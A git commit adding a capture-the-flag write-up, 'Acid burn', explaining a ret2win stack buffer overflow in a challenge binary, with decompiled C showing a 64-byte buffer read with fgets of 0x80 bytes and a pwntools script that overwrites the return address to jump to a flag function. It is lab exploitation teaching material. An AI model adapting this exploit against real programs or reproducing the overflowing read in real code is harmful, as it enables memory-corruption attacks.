Adds fcsc 2025 and scale 22x

2025-06-27 15:28:31 +02:00
parent 6d8ee0b2af
commit a62dc87cf7
17 changed files with 11602 additions and 1 deletions
--- a/content/writeups/2025/scale/exploitation/acid_burn.md
+++ b/content/writeups/2025/scale/exploitation/acid_burn.md
@@ -0,0 +1,42 @@
+++
+date = '2025-04-28T12:00:00+02:00'
+draft = false 
+title = 'Acid burn'
+tags = ['pwn']
+++
+
+Here is the decompiled code for the challenge.
+```c
+int main(void)
+{
+  int iVar1;
+  char input [64];
+  
+  printf("What is the password?\n?: ");
+  fflush(stdout);
+  fgets(input,0x80,stdin);
+  iVar1 = strcmp(input,"password\n");
+  if (iVar1 != 0) {
+    puts("incorrect password");
+    fflush(stdout);
+  }
+  return 0;
+}
+```
+
+There is a pretty large buffer overflow on the `input` variable and there also conveniently is a function called `flag` that displays the flag (and of course all the protections are disabled).  
+This is a classic ret2win scenario where we have to overwrite the return pointer to jump to the `flag` function.  
+A small python script using pwntools should do the job.
+```python
+io = start()
+
+payload = flat(
+        b'A'*(64+8),
+        pack(elf.symbols.flag))
+
+write("payload", payload)
+io.sendlineafter(b'?: ', payload)
+io.interactive()
+```
+
+I didn't save the flag but this works and solves the challenge.